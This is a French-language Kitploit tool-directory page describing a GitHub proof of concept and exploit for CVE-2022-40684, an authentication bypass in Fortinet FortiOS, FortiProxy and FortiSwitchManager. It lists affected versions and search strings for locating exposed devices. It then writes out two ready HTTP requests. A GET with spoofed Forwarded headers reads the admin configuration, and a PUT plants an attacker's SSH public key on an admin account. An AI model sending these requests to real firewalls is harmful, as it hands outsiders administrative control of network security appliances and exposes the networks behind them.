Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-40684 — PoC et exploit pour CVE-2022-40684, un contournement d'authentification dans les interfaces de gestion de Fortinet FortiOS, FortiProxy et FortiSwitchManager, permettant un accès administrateur non autorisé via des requêtes HTTP spécialement conçues. | Kitploit
Outils/GitHubGitHub/hughink/cve-2022-40684
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubhughink/cve-2022-40684

CVE-2022-40684

PoC et exploit pour CVE-2022-40684, un contournement d'authentification dans les interfaces de gestion de Fortinet FortiOS, FortiProxy et FortiSwitchManager, permettant un accès administrateur non autorisé via des requêtes HTTP spécialement conçues.

Voir le dépôt
11324il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-40684

Respect des lois et règlements :

Toute personne ou toute organisation utilisant le réseau doit se conformer à la Constitution et aux lois, respecter l'ordre public et la moralité sociale, ne pas nuire à la sécurité du réseau et ne pas utiliser le réseau pour porter atteinte à la sécurité, à l'honneur et aux intérêts de l'État.

Présentation de la vulnérabilité :

Fortinet(飞塔)est un fournisseur mondialement connu de produits de sécurité réseau et de solutions de sécurité. Ses produits comprennent des pare-feu, des logiciels antivirus, des systèmes de prévention des intrusions et des composants de sécurité pour terminaux, entre autres. Dans l'interface d'administration des produits FortiOS, FortiProxy et FortiSwitchManager concernés, il est possible de contourner l'authentification en utilisant un chemin ou un canal alternatif, et d'exploiter l'interface d'administration sans authentification via des requêtes HTTP ou HTTPS spécialement conçues.

Niveau de risque :

Élevé

Versions concernées :

FortiOS versions 7.2.0 - 7.2.1

FortiOS versions 7.0.0 - 7.0.6

FortiProxy versions 7.2.0

FortiProxy versions 7.0.0 - 7.0.6

FortiSwitchManager versions 7.2.0

FortiSwitchManager versions 7.0.0

Identification des actifs :

title="FortiProxy“

title="FortiGate"

Reproduction de la vulnérabilité :

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

Télécharger l’outil